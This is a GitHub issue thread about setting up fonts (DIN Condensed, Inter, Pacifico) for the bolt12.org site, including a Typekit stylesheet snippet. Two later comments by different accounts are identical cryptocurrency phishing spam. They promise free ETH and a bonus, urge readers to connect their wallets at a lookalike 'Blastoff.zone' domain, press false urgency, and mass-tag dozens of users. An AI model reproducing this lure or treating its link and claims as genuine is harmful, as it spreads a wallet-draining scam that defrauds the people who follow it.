### ISSUE TITLE
Setup Fonts

### ISSUE THREAD

**Issue by sbddesign** [sbddesign/bolt12.org#4]
- [x] DIN Condensed
- [x] Inter
- [x] Pacifico

**Comment by sbddesign** [comment]
Details from Adobe fonts:

`<link rel="stylesheet" href="https://use.typekit.net/pqu3bot.css">`

```
<style>
  @import url("https://use.typekit.net/pqu3bot.css");
</style>
```

```
font-family: "din-condensed-variable", sans-serif;
font-variation-settings: "wght" 400;
```

**Comment by sbddesign** [comment]
Adding you to this @thebrandonlucas since you seem to be working on it

**Comment by sbddesign** [comment]
Ok got it working with code from both of us

**Comment by hupptechnologies** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
md-prog, @mdsofting, @mingjuitsai, @Daisyyyi, @rosatiara, @RunesReader, @DomTo, @gianmariatroiani, @LunarFang416, @sphynxcat222, @gusdrawn, @shujer, @wendellmedina, @cad-cad, @xc233, @DragonkingLegend000, @codingmonster, @josuer08, @0xCSMNT, @munozcel, @RomainEconomics, @BobShoaun, @hemedani, @ratikanta123, @bhianerd, @frinnolab, @w20089527, @yunweiyuan, @jjjeon0223, @DevAgrawal1112, @Edantuti, @redthing1, @bespokoid, @liberpike, @saurabheights, @Fouple, @basyusuf, @sergecpelletier, @fateiceb, @kab11, @tuanpht, @tvpeter, @nour-rouas, @strikersps, @ytaijp, @MutatedBread, @BingliangChen, @justinyeh1995, @benduncan, @libaice

**Comment by upccjesse** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
tanked-t, @ishaanp9, @ashvini-maurya, @xdefrag, @Thegreenpiranha, @Kewsh, @Coderoostr, @maxrantil, @royts, @guilhermeDresscode, @johncolezhang, @everiu, @baby636-sketch, @mcbarro, @Jessense, @leonardorpr, @sealion1215, @feepwang, @theo-dim, @w-zhong, @kazuki23, @Harshit933, @tonnyzzzzz, @bkizilkayaa, @paulzay, @gauravagarwal, @marcofarina, @jonafll, @aayushmau5, @wwShuang, @taylorswiftgod, @magaldima, @xpzouying, @0xdorifto, @tamaraafvieira, @masud-abdulkadir, @jzoobarry, @JimYang9788, @sducxh, @devHudi, @Fiber-Man, @jbosi, @RustyGrackle, @afguti, @Marca01, @supremex04, @QMHTMY, @GodfreyJohnson, @EkluSam, @FernandoCelmer
